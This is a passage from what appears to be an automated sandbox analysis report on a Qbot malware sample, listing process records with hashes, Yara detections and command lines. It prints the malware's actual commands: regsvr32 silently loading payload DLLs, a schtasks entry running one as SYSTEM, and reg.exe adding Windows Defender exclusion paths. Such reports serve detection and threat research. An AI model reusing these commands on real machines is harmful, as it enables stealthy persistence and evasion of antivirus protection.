                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0x260000
                          File size:2972672 bytes
                          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.881366079.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                          Reputation:high

                          Analysis Process: regsvr32.exe PID: 2920 Parent PID: 2752

                          General

                          Start time:22:08:58
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd1.red
                          Imagebase:0xff540000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: schtasks.exe PID: 2932 Parent PID: 2980

                          General

                          Start time:22:08:58
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
                          Imagebase:0x30000
                          File size:179712 bytes
                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: regsvr32.exe PID: 2976 Parent PID: 2752

                          General

                          Start time:22:08:58
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd2.red
                          Imagebase:0xff540000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: regsvr32.exe PID: 672 Parent PID: 1672

                          General

                          Start time:22:09:00
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xff120000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Analysis Process: regsvr32.exe PID: 408 Parent PID: 672

                          General

                          Start time:22:09:01
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xf10000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.634139082.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000D.00000002.632447302.00000000002A0000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:moderate

                          Analysis Process: explorer.exe PID: 2136 Parent PID: 408

                          General

                          Start time:22:09:03
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0x260000
                          File size:2972672 bytes
                          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000000E.00000002.881374188.00000000000C0000.00000040.00020000.sdmp, Author: Joe Security
                          Reputation:high

                          Analysis Process: reg.exe PID: 2132 Parent PID: 2136

                          General

                          Start time:22:09:05
                          Start date:28/09/2021
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'
                          Imagebase:0xff5d0000
                          File size:74752 bytes
                          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: reg.exe PID: 2680 Parent PID: 2136

                          General

                          Start time:22:09:07
                          Start date:28/09/2021
                          Path:C:\Windows\System32\reg.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0'
                          Imagebase:0xff0c0000
                          File size:74752 bytes
                          MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: regsvr32.exe PID: 2116 Parent PID: 1672

                          General

                          Start time:22:10:00
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xffd60000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Analysis Process: regsvr32.exe PID: 2848 Parent PID: 2116

                          General

                          Start time:22:10:00
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -s 'C:\Users\user\Drezd.red'
                          Imagebase:0xe40000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Disassembly

                          Code Analysis

                          Reset < >